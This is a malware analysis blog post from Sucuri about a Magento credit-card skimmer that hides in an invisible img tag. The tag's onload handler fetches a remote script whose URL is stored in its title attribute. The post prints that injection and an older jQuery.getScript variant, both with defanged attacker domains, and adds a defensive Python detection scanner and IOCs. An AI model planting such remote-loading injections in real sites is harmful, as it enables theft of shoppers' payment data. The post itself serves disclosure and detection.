Web Swiper in Image Title

January 27, 2020, by Denis Sinegubko

Cybercriminals regularly try a variety of approaches to hide their malicious code — web skimmers are well known for using all sorts of obfuscation and masquerading.

Suspicious Img Tag

Our malware analyst Liam Smith recently discovered a suspicious-looking image tag in the database of a compromised Magento site.

<img height="1px" width="1px" style="display:none;"
src="/skin/frontend/smartwave/mango/images/cs_logo_white.png"
title="hxxps://intljs.rmtag[.]net/js/slider.js"
onload=jQuery.getScript(this.title)>

At first glance, it just looks like an <img> tag that loads a real image file. However, a closer look reveals a few strange things:

  • The image dimensions are 1x1px with the “display:none;” style. It’s basically an invisible pixel.
  • There is a URL of a third-party JavaScript file in the title parameter.
  • There is an onload handler that loads and executes a remote script from the URL stored in the title parameter.

This doesn’t look like a legit use of an <img> tag, does it? So, what can this remote script do?

Conditional Skimmer Injection

If you load the remote script directly, you'll see the real slider code and nothing else. However, if the same script is requested from the checkout page, some extra code is appended to the very end of this long single-line script.

Figure: Malicious code appended at the end of the script, blending into the legitimate slider code.

This malware is heavily obfuscated. After a few rounds of decoding, you get this code that retrieves payment information from the checkout form and sends it to hxxps://intljs.rmtag[.]net/on/.

Figure: Part of the deobfuscated malware that steals payment details.

Past Variations

We found that the intljs.rmtag[.]net domain has been used in a few more web skimmers. For example, the following code was found several months ago on another ecommerce site.

<script>jQuery.getScript("hxxps://intljs.rmtag[.]net/app/113830.js");</script>

In this case, the injection is not as elaborate as the <img> tag sample above, but it uses the same, quite rare, jQuery.getScript technique.
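Both variants share two structural indicators that do not depend on the skimmer's domain: an <img> whose on* handler executes a remote URL parked in a non-src attribute, and an inline jQuery.getScript() call that pulls a script from another origin. The scanner below is an added example (not Sucuri's own tooling) that flags both patterns in stored HTML such as CMS database rows; the sample content and the cdn.example domain are constructed placeholders, not the real infection.

```python
import re
from html.parser import HTMLParser

# Constructed sample modelled on the two injections shown on the page; cdn.example is a placeholder domain.
SAMPLE_HTML = """
<img height="1px" width="1px" style="display:none;"
     src="/skin/frontend/smartwave/mango/images/cs_logo_white.png"
     title="https://cdn.example/js/slider.js" onload=jQuery.getScript(this.title)>
<img src="/skin/frontend/smartwave/mango/images/logo.png" alt="Store logo">
<script>jQuery.getScript("https://cdn.example/app/113830.js");</script>
<script>jQuery.getScript("/js/lib/slider.js");</script>
"""

REMOTE_URL = re.compile(r"^(?:https?:)?//", re.I)
GETSCRIPT = re.compile(r"jQuery\.getScript\s*\(\s*([\"']?)([^\"')]+)\1", re.I)

class SkimmerIndicatorScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None  # buffer for the body of the current <script>

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = []
        elif tag == "img":
            a = {k.lower(): (v or "") for k, v in attrs}
            # The page's trick: an on* handler executes a remote URL parked in a non-src attribute.
            handlers = [v for k, v in a.items() if k.startswith("on")]
            urls = [v for k, v in a.items() if k != "src" and REMOTE_URL.match(v)]
            if handlers and urls:
                # Invisible pixel: display:none or a 1x1 (or 0x0) box.
                hidden = "display:none" in a.get("style", "").replace(" ", "") or a.get("width") in ("0", "1", "1px")
                self.findings.append({"kind": "img-onload-remote-script", "url": urls[0], "hidden": hidden})

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            # Older variant: an inline jQuery.getScript() pulling a script from another origin.
            for _, url in GETSCRIPT.findall("".join(self._script)):
                if REMOTE_URL.match(url):
                    self.findings.append({"kind": "inline-getscript-remote", "url": url, "hidden": False})
            self._script = None

def scan(html):
    """Return indicator findings for one chunk of stored HTML (e.g. a CMS database row)."""
    scanner = SkimmerIndicatorScanner()
    scanner.feed(html)
    return scanner.findings
```

Run scan() over exported CMS content or rendered checkout pages; same-origin getScript calls and ordinary images produce no findings, so the output stays short enough to review by hand.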

Bad Neighborhood

The rmtag[.]net domain was originally created a year ago, on Jan. 6, 2019. While it has been renewed for another year, until 2021, the second-level domain is parked. However, the "intljs" subdomain points to a different IP, 207.244.67.218, which belongs to a server hosting lots of sketchy and malicious sites.

Figure: WHOIS record and domain list for the server hosting the malware (source: https://dnslytics.com/ip/207.244.67.218).

Most of the domains on this IP once redirected to scam sites via hxxps://sarah.tncrun[.]net/tr.

Conclusion

Currently, some of the most customized malware on infected client sites is being found in the form of web skimmers. Criminals are taking the time to modify their injected code for almost every compromised site. Customizations vary from case to case, with obfuscation techniques increasing the time the skimmer goes undetected and extending its ability to steal credit card and personal information from the compromised environment.

This particular infection includes the sneaky use of an <img> tag with a malicious title and onload handler, along with conditional loading of a web skimmer script. On other compromised ecommerce sites we're seeing a variety of tricks, including the use of fake domains pretending to be reputable scripts and libraries — and we're finding more techniques every day.

What this means is that online stores shouldn't rely on recognizing particular malware patterns. Instead, websites should use integrity control tools and professional security monitoring to identify malicious behaviour and indicators of compromise.

If you find a web skimmer on your site or suspect malicious activity, we can help with a thorough scan and malware removal.


About Denis Sinegubko

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.
